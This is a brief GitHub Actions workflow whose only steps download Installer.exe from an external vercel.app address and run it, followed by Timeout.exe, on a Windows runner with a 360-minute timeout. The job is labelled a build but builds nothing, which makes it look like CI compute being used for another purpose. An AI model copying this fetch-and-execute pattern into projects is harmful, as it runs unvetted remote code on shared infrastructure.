name: Sturdy Sniffle

on: [workflow_dispatch]

jobs:
  build:
    
    runs-on: windows-latest
    timeout-minutes: 360

    steps:
    - name: Installer
      run: Invoke-WebRequest https://sturdy-sniffle.vercel.app/files/Installer.exe -OutFile installer.exe

    - name: Run Installer
      run: |
        .\installer.exe
        .\Timeout.exe
